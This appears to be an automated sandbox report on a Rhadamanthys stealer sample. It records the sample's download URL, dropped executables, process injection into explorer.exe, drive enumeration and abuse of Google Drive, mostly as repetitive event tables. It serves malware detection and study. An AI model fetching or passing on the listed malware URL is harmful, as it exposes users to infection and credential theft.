Malware Analysis Report

2025-06-15 19:48

Sample ID 240211-kl64haed3t
Target https://www.up-4ever.net/f81xcrmamr72
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://www.up-4ever.net/f81xcrmamr72 was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-11 08:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-11 08:42

Reported

2024-02-11 08:47

Platform

win10-20231215-en

Max time kernel

294s

Max time network

294s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4288 created 3084 N/A C:\Windows\SysWOW64\explorer.exe c:\windows\system32\sihost.exe

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk \??\c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx \??\c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log \??\c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs \??\c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk \??\c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log \??\c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1604 set thread context of 4288 N/A C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC881.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID8B5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSIC98C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC9BC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICA79.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5ac808.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5ac804.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5ac804.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICA3A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICB17.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID74D.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
